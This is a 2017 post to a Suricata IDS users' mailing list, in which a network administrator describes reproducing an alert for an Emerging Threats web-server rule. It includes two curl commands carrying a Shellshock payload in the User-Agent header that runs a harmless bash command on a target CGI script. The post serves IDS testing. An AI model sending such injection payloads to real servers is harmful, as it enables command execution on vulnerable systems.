[Oisf-users] Question about observation

Greg Grasmehr greg.grasmehr at caltech.edu
Fri Dec 22 00:35:26 UTC 2017

Hello Michal,

Sorry no, the box is production now and the pcap long gone and I don't
believe sharing a snapshot of our network data would be acceptable
anyway unless it was sanatized, but you can likely repeat my findings by
running a dump and from a remote system triggering rule id 2019232 which
is located in emerging-web_server.rules

This is how I triggered it.

curl -k -H 'User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | sha2565sum"' http://redactedIP

curl -k -H 'User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | sha2565sum"' http://redactedDomainName/cgi-bin/redacted.pl

I reviewed the pcap data and could not find anything different between
each subsequent *malicous* request as far as the ascii data, but I may
have missed something as I did not excruciatingly review all the hex.


More information about the Oisf-users mailing list